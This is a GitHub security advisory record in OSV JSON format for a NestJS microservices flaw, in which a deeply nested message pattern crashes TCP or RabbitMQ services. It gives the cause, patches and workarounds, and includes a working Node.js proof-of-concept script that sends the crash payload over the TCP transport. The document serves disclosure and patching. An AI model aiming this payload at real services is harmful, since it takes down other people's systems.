{"id":"GHSA-m8vh-jmq9-5rjg","summary":"Nest: Remote process termination via a deeply nested microservice message pattern","details":"| Field | Value |\n| --- | --- |\n| Ecosystem | npm |\n| Package | `@nestjs/microservices` |\n| Affected versions | `\u003e= 12.0.0, \u003c 12.0.2` and `\u003c 11.2.4` |\n| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |\n\n### Summary\n\nA single message whose `pattern` is a deeply nested object terminates a NestJS microservice that uses the TCP or\nRabbitMQ transport. The server serialized the client-supplied pattern with `JSON.stringify` to derive the handler\nlookup key; on deeply nested input this throws `RangeError: Maximum call stack size exceeded`. The exception escaped\nthe asynchronous message handler as an unhandled promise rejection, which terminates the Node.js process under the\ndefault `--unhandled-rejections=throw`.\n\n### Impact\n\nDenial of service, one message per crash, repeatable. The attacker needs to be able to reach the transport: connect\nto the TCP transport's port, or publish to the queue or exchange the service consumes from. The TCP transport\nperforms no authentication by default, so on a reachable port this requires nothing else.\n\nOnly the **TCP** and **RabbitMQ** transports are affected. The other transports take the pattern as a string from the\nbroker topic or channel and never serialize a client-supplied object to build it.\n\n### Details\n\nIn `ServerTCP#handleMessage` and `ServerRMQ#handleMessage` the pattern was stringified without a guard:\n\n```ts\nconst pattern = isString(packet.pattern)\n  ? packet.pattern\n  : JSON.stringify(packet.pattern);\n```\n\n`JSON.parse` accepts nesting depths that `JSON.stringify` cannot re-serialize, because `JSON.stringify` recurses\nnatively, so an attacker can craft a payload that parses successfully on arrival and then throws when the pattern is\nconverted back to a string. Neither transport attached a rejection handler to the promise returned by\n`handleMessage`, so the `RangeError` propagated out as an unhandled rejection.\n\n### Proof of concept\n\nAgainst a NestJS microservice on the TCP transport (default port 3001). The nested JSON is built as text rather than\nwith `JSON.stringify`, which is what makes the payload serializable by the attacker but not by the victim:\n\n```js\nconst { connect } = require('node:net');\n\nconst DEPTH = 100_000;\nconst pattern = '{\"nested\":'.repeat(DEPTH) + '{}' + '}'.repeat(DEPTH);\nconst payload = `{\"pattern\":${pattern},\"data\":null,\"id\":\"1\"}`;\n\nconst socket = connect(3001, '127.0.0.1', () =\u003e {\n  // Nest's TCP framing is \u003cbyteLength\u003e#\u003cjson\u003e\n  socket.write(`${Buffer.byteLength(payload)}#${payload}`);\n});\n```\n\nThe service exits with `RangeError: Maximum call stack size exceeded`. The equivalent payload published to the\nconsumed queue crashes a RabbitMQ-transport service.\n\n### Patches\n\nFixed in **12.0.2** and **11.2.4**.\n\n- Incoming patterns are converted through a guarded `Server#getPatternAsString`, which falls back to a sentinel value\n  that matches no handler. Such a message now receives the ordinary \"no message handler\" response (TCP) or is\n  negatively acknowledged (RabbitMQ) instead of crashing the process.\n- Rejections escaping `handleMessage` in both transports are routed to `handleError` rather than left unhandled.\n\n### Workarounds\n\nIf you cannot upgrade, restrict network access to the transport so that only trusted peers can reach it. Running the\nprocess with `--unhandled-rejections=warn` prevents the crash but leaves the message unprocessed and is not a\nsubstitute for the fix.\n\n### Credit\n\nReported by ZeroVuln Labs.","aliases":["CVE-2026-102281"],"modified":"2026-09-30T00:00:03.849760028Z","published":"2026-09-29T23:54:44Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-09-29T23:54:44Z","nvd_published_at":"2026-09-28T22:17:32Z","cwe_ids":["CWE-248","CWE-674"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/nestjs/nest/security/advisories/GHSA-m8vh-jmq9-5rjg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-102281"},{"type":"WEB","url":"https://github.com/nestjs/nest/pull/17737"},{"type":"WEB","url":"https://github.com/nestjs/nest/commit/aa97b5144d8dff1ce700aac521eb86449a679d6f"},{"type":"WEB","url":"https://github.com/nestjs/nest/commit/e9dcd4c7ac64361fbfe79461da85f5b3fc3e02da"},{"type":"PACKAGE","url":"https://github.com/nestjs/nest"},{"type":"WEB","url":"https://github.com/nestjs/nest/releases/tag/v11.2.4"},{"type":"WEB","url":"https://github.com/nestjs/nest/releases/tag/v12.0.2"}],"affected":[{"package":{"name":"@nestjs/microservices","ecosystem":"npm","purl":"pkg:npm/%40nestjs/microservices"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"11.2.4"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-m8vh-jmq9-5rjg/GHSA-m8vh-jmq9-5rjg.json"}},{"package":{"name":"@nestjs/microservices","ecosystem":"npm","purl":"pkg:npm/%40nestjs/microservices"},"ranges":[{"type":"SEMVER","events":[{"introduced":"12.0.0"},{"fixed":"12.0.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-m8vh-jmq9-5rjg/GHSA-m8vh-jmq9-5rjg.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}